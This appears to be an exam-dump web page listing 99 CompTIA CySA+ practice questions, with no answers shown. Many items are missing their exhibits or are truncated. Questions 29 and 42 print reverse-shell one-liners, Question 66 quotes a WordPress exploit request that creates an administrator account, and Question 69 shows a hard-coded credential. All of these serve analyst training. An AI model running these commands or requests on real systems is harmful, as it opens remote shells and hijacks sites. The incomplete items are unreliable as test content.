Weekend Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70special

CompTIA CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Exam Practice Test

Page: 1 / 33
Total 327 questions

CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Testing Engine

  • Product Type: Testing Engine
$36  $119.99

PDF Study Guide

  • Product Type: PDF Study Guide
$31.5  $104.99
Question 1

An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of the following teams is the analyst a member of?

Options:

A.

Orange team

B.

Blue team

C.

Red team

D.

Purple team

Question 2

A Chief Information Security Officer wants to implement security by design, starting …… vulnerabilities, including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?

Options:

A.

Reverse engineering

B.

Known environment testing

C.

Dynamic application security testing

D.

Code debugging

Question 3

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.

2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.

3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A)

B)

C)

D)

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question 4

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?

Options:

A.

Bots

B.

loCs

C.

TTPs

D.

Signatures

Question 5

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

Options:

A.

CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L

B.

CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L

C.

CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H

D.

CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Question 6

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Question 7

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Question 8

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

Options:

A.

Deploy a CASB and enable policy enforcement

B.

Configure MFA with strict access

C.

Deploy an API gateway

D.

Enable SSO to the cloud applications

Question 9

Which of the following most accurately describes the Cyber Kill Chain methodology?

Options:

A.

It is used to correlate events to ascertain the TTPs of an attacker.

B.

It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.

C.

It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage

D.

It outlines a clear path for determining the relationships between the attacker, the technology used, and the target

Question 10

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

Options:

A.

Corrective controls

B.

Compensating controls

C.

Operational controls

D.

Administrative controls

Question 11

Which of the following best describes the key elements of a successful information security program?

Options:

A.

Business impact analysis, asset and change management, and security communication plan

B.

Security policy implementation, assignment of roles and responsibilities, and information asset classification

C.

Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D.

Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

Question 12

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Options:

A.

Implement segmentation with ACLs.

B.

Configure logging and monitoring to the SIEM.

C.

Deploy MFA to cloud storage locations.

D.

Roll out an IDS.

Question 13

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation.

Review the information provided and determine the following:

1. HOW many employees Clicked on the link in the Phishing email?

2. on how many workstations was the malware installed?

3. what is the executable file name of the malware?

Options:

Question 14

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents

B.

Backup data

C.

Temporary files

D.

Running processes

Question 15

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

Options:

A.

Ask the web development team to update the page contents

B.

Add the IP address allow listing for control panel access

C.

Purchase an appropriate certificate from a trusted root CA

D.

Perform proper sanitization on all fields

Question 16

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

Options:

A.

Develop a call tree to inform impacted users

B.

Schedule a review with all teams to discuss what occurred

C.

Create an executive summary to update company leadership

D.

Review regulatory compliance with public relations for official notification

Question 17

A security analyst found the following vulnerability on the company’s website:

Which of the following should be implemented to prevent this type of attack in the future?

Options:

A.

Input sanitization

B.

Output encoding

C.

Code obfuscation

D.

Prepared statements

Question 18

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

Options:

A.

Determine the sophistication of the audience that the report is meant for

B.

Include references and sources of information on the first page

C.

Include a table of contents outlining the entire report

D.

Decide on the color scheme that will effectively communicate the metrics

Question 19

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.

It provides analytical pivoting and identifies knowledge gaps.

B.

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.

It provides concise evidence that can be used in court

D.

It allows for proactive detection and analysis of attack events

Question 20

A company has the following security requirements:

. No public IPs

· All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

Options:

A.

VM_PRD_DB

B.

VM_DEV_DB

C.

VM_DEV_Web02

D.

VM_PRD_Web01

Question 21

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following:

Which of the following vulnerabilities should be prioritized?

Options:

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Question 22

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

Options:

A.

Hacktivist

B.

Organized crime

C.

Nation-state

D.

Lone wolf

Question 23

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

Options:

A.

Inform the internal incident response team.

B.

Follow the company's incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Question 24

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an HttpOnlvflaq to force communication by HTTPS

B.

Block requests without an X-Frame-Options header

C.

Configure an Access-Control-Allow-Origin header to authorized domains

D.

Disable the cross-origin resource sharing header

Question 25

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Which of the following vulnerability types is the security analyst validating?

Options:

A.

Directory traversal

B.

XSS

C.

XXE

D.

SSRF

Question 26

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

Options:

A.

Registry change

B.

Rename computer

C.

New account introduced

D.

Privilege escalation

Question 27

Which of the following is the most important factor to ensure accurate incident response reporting?

Options:

A.

A well-defined timeline of the events

B.

A guideline for regulatory reporting

C.

Logs from the impacted system

D.

A well-developed executive summary

Question 28

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A.

Lessons learned

B.

Service-level agreement

C.

Playbook

D.

Affected hosts

E.

Risk score

F.

Education plan

Question 29

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

Options:

A.

Network pivoting

B.

Host scanning

C.

Privilege escalation

D.

Reverse shell

Question 30

A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

Which of the following log entries provides evidence of the attempted exploit?

Options:

A.

Log entry 1

B.

Log entry 2

C.

Log entry 3

D.

Log entry 4

Question 31

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

Options:

A.

grep [IP address] packets.pcap

B cat packets.pcap | grep [IP Address]

B.

tcpdump -n -r packets.pcap host [IP address]

C.

strings packets.pcap | grep [IP Address]

Question 32

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A.

The NTP server is not configured on the host.

B.

The cybersecurity analyst is looking at the wrong information.

C.

The firewall is using UTC time.

D.

The host with the logs is offline.

Question 33

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization?

Options:

A.

To establish what information is allowed to be released by designated employees

B.

To designate an external public relations firm to represent the organization

C.

To ensure that all news media outlets are informed at the same time

D.

To define how each employee will be contacted after an event occurs

Question 34

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

Options:

A.

Creating a playbook denoting specific SLAs and containment actions per incident type

B.

Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs

C.

Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders

D.

Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

Question 35

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Options:

A.

Deploy agents on all systems to perform the scans.

B.

Deploy a central scanner and perform non-credentialed scans.

C.

Deploy a cloud-based scanner and perform a network scan.

D.

Deploy a scanner sensor on every segment and perform credentialed scans.

Question 36

A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system

owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to

categorize and prioritize the respective systems?

Options:

A.

Interview the users who access these systems,

B.

Scan the systems to see which vulnerabilities currently exist.

C.

Configure alerts for vendor-specific zero-day exploits.

D.

Determine the asset value of each system.

Question 37

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

Options:

A.

PCI Security Standards Council

B.

Local law enforcement

C.

Federal law enforcement

D.

Card issuer

Question 38

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

Options:

A.

Mean time to detect

B.

Mean time to respond

C.

Mean time to remediate

D.

Service-level agreement uptime

Question 39

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

Options:

A.

Reconnaissance

B.

Weaponization

C.

Exploitation

D.

Installation

Question 40

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

Options:

A.

Non-repudiation

B.

Authentication

C.

Authorization

D.

Integrity

Question 41

A security analyst reviews the following results of a Nikto scan:

Which of the following should the security administrator investigate next?

Options:

A.

tiki

B.

phpList

C.

shtml.exe

D.

sshome

Question 42

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bash

nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B.

#!/bin/bash

ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

C.

#!/bin/bash

ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

D.

#!/bin/bash

netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

Question 43

A company has decided to expose several systems to the internet, The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below:

Which of the following systems should be prioritized for patching?

Options:

A.

brown

B.

grey

C.

blane

D.

sullivan

Question 44

An analyst is trying to capture anomalous traffic from a compromised host. Which of the following are the best tools for achieving this objective? (Select two).

Options:

A.

tcpdump

B.

SIEM

C.

Vulnerability scanner

D.

Wireshark

E.

Nmap

F.

SOAR

Question 45

During an incident, analysts need to rapidly investigate by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an incident?

Options:

A.

Implement data encryption and close the data so only the company has access.

B.

Ensure permissions are limited in the investigation team and encrypt the data.

C.

Implement data encryption and create a standardized procedure for deleting data that is no longer needed.

D.

Ensure that permissions are open only to the company.

Question 46

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation?

Options:

A.

Fuzzing

B.

Coding review

C.

Debugging

D.

Static analysis

Question 47

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

Options:

A.

MOU

B.

NDA

C.

BIA

D.

SLA

Question 48

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

Options:

A.

InLoud:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: Yes

Channing: No

B.

TSpirit:

Cobain: Yes

Grohl: Yes

Novo: Yes

Smear: No

Channing: No

C.

ENameless:

Cobain: Yes

Grohl: No

Novo: Yes

Smear: No

Channing: No

D.

PBleach:

Cobain: Yes

Grohl: No

Novo: No

Smear: No

Channing: Yes

Question 49

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?

Options:

A.

Chain of custody was not maintained for the evidence drive.

B.

Legal authorization was not obtained prior to seizing the evidence drive.

C.

Data integrity of the imaged drive could not be verified.

D.

Evidence drive imaging was performed without a write blocker.

Question 50

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

Options:

A.

Delivery

B.

Command and control

C.

Reconnaissance

D.

Weaporization

Question 51

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Question 52

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Question 53

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.

Scope

B.

Weaponization

C.

CVSS

D.

Asset value

Question 54

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

Options:

A.

Command and control

B.

Actions on objectives

C.

Exploitation

D.

Delivery

Question 55

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following

does this most likely describe?

Options:

A.

System hardening

B.

Hybrid network architecture

C.

Continuous authorization

D.

Secure access service edge

Question 56

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Question 57

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.

nessie.explosion

B.

vote.4p

C.

sweet.bike

D.

great.skills

Question 58

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

Options:

A.

CASB

B.

SASE

C.

ZTNA

D.

SWG

Question 59

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

• DNS traffic while a tunneling session is active.

• The mean time between queries is less than one second.

• The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

Options:

A.

DNS exfiltration

B.

DNS spoofing

C.

DNS zone transfer

D.

DNS poisoning

Question 60

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

Options:

A.

TO ensure the report is legally acceptable in case it needs to be presented in court

B.

To present a lessons-learned analysis for the incident response team

C.

To ensure the evidence can be used in a postmortem analysis

D.

To prevent the possible loss of a data source for further root cause analysis

Question 61

Which of the following would likely be used to update a dashboard that integrates…..

Options:

A.

Webhooks

B.

Extensible Markup Language

C.

Threat feed combination

D.

JavaScript Object Notation

Question 62

A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?

Options:

A.

Hacklivist

B.

Advanced persistent threat

C.

Insider threat

D.

Script kiddie

Question 63

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Select two).

Options:

A.

SOAR

B.

SIEM

C.

MSP

D.

NGFW

E.

XDR

F.

DLP

Question 64

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?

Options:

A.

File debugging

B.

Traffic analysis

C.

Reverse engineering

D.

Machine isolation

Question 65

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Question 66

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Question 67

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

Options:

A.

OSSTMM

B.

Diamond Model Of Intrusion Analysis

C.

OWASP

D.

MITRE ATT&CK

Question 68

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

Options:

A.

wh4dc-748gy.lan (192.168.86.152)

B.

lan (192.168.86.22)

C.

imaging.lan (192.168.86.150)

D.

xlaptop.lan (192.168.86.249)

E.

p4wnp1_aloa.lan (192.168.86.56)

Question 69

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getconnection (database01, "alpha " , "AXTV. 127GdCx94GTd") ;

Which of the following is the most likely vulnerability in this system?

Options:

A.

Lack of input validation

B.

SQL injection

C.

Hard-coded credential

D.

Buffer overflow attacks

Question 70

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).

Options:

A.

Drop the tables on the database server to prevent data exfiltration.

B.

Deploy EDR on the web server and the database server to reduce the adversaries capabilities.

C.

Stop the httpd service on the web server so that the adversary can not use web exploits

D.

use micro segmentation to restrict connectivity to/from the web and database servers.

E.

Comment out the HTTP account in the / etc/passwd file of the web server

F.

Move the database from the database server to the web server.

Question 71

Which of the following can be used to learn more about TTPs used by cybercriminals?

Options:

A.

ZenMAP

B.

MITRE ATT&CK

C.

National Institute of Standards and Technology

D.

theHarvester

Question 72

A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this

requirement?

Options:

A.

SIEM

B.

CASB

C.

SOAR

D.

EDR

Question 73

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.

Deploy a database to aggregate the logging.

B.

Configure the servers to forward logs to a SIEM-

C.

Share the log directory on each server to allow local access,

D.

Automate the emailing of logs to the analysts.

Question 74

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

Options:

A.

Agree on the goals and objectives of the plan

B.

Determine the site to be used during a disaster

C Demonstrate adherence to a standard disaster recovery process

C.

Identity applications to be run during a disaster

Question 75

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

Options:

A.

Insider threat

B.

Ransomware group

C.

Nation-state

D.

Organized crime

Question 76

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Select two).

Options:

A.

Signal-shielded bag

B.

Tamper-evident seal

C.

Thumb drive

D.

Crime scene tape

E.

Write blocker

F.

Drive duplicator

Question 77

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

Options:

A.

Risk register

B.

Vulnerability assessment

C.

Penetration test

D.

Compliance report

Question 78

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

Options:

A.

KPI

B.

SLO

C.

SLA

D.

MOU

Question 79

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

Options:

A.

Enrich the SIEM-ingested data to include all data required for triage.

B.

Schedule a task to disable alerting when vulnerability scans are executing.

C.

Filter all alarms in the SIEM with low severity.

D.

Add a SOAR rule to drop irrelevant and duplicated notifications.

Question 80

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

Options:

A.

function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B.

function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C.

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D.

function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

Question 81

The developers recently deployed new code to three web servers. A daffy automated external device scan report shows server vulnerabilities that are failure items according to PCI DSS.

If the venerability is not valid, the analyst must take the proper steps to get the scan clean.

If the venerability is valid, the analyst must remediate the finding.

After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation Result and Remediation Action for each server listed using the drop-down options.

INTRUCTIONS:

The simulation includes 2 steps.

Step1:Review the information provided in the network diagram and then move to the STEP 2 tab.

STEP 2: Given the Scenario, determine which remediation action is required to address the vulnerability.

Options:

Question 82

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of

the following attacks was most likely performed?

Options:

A.

RFI

B.

LFI

C.

CSRF

D.

XSS

Question 83

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?

Options:

A.

SMB share

B.

API endpoint

C.

SMTP notification

D.

SNMP trap

Question 84

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

Options:

A.

Beaconing

B.

Cross-site scripting

C.

Buffer overflow

D.

PHP traversal

Question 85

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?

Options:

A.

Legacy system

B.

Business process interruption

C.

Degrading functionality

D.

Configuration management

Question 86

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

Options:

A.

MFA

B.

User and password

C.

PAM

D.

Key pair

Question 87

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A.

Review Of security requirements

B.

Compliance checks

C.

Decomposing the application

D.

Security by design

Question 88

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

Options:

A.

PAM

B.

IDS

C.

PKI

D.

DLP

Question 89

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

Options:

A.

Hard disk

B.

Primary boot partition

C.

Malicious tiles

D.

Routing table

E.

Static IP address

Question 90

An organization's email account was compromised by a bad actor. Given the following Information:

Which of the following is the length of time the team took to detect the threat?

Options:

A.

25 minutes

B.

40 minutes

C.

45 minutes

D.

2 hours

Question 91

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.

1

B.

2

C.

3

D.

4

Question 92

A security analyst is assisting a software engineer with the development of a custom log collection and alerting tool (SIEM) for a proprietary system. The analyst is concerned that the tool will not detect known attacks and behavioral loCs. Which of the following should be configured in order to resolve this issue?

Options:

A.

Randomly generate and store all possible file hash values.

B.

Create a default rule to alert on any change to the system.

C.

Integrate with an open-source threat intelligence feed.

D.

Manually add known threat signatures into the tool.

Question 93

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?

Options:

A.

Eradication

B.

Isolation

C.

Reporting

D.

Forensic analysis

Question 94

A team of analysts is developing a new internal system that correlates information from a variety of sources analyzes that information, and then triggers notifications according to company policy Which of the following technologies was deployed?

Options:

A.

SIEM

B.

SOAR

C.

IPS

D.

CERT

Question 95

A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A.

Risk register

B.

Change control documentation

C.

Incident response playbook

D.

Incident response plan

Question 96

The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

Options:

A.

Employee turnover

B.

Intrusion attempts

C.

Mean time to detect

D.

Level of preparedness

Question 97

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Options:

A.

Business continuity plan

B.

Vulnerability management plan

C.

Disaster recovery plan

D.

Asset management plan

Question 98

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the

following did the change management team fail to do?

Options:

A.

Implementation

B.

Testing

C.

Rollback

D.

Validation

Question 99

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.

Containerization

B.

Manual code reviews

C.

Static and dynamic analysis

D.

Formal methods

Page: 1 / 33
Total 327 questions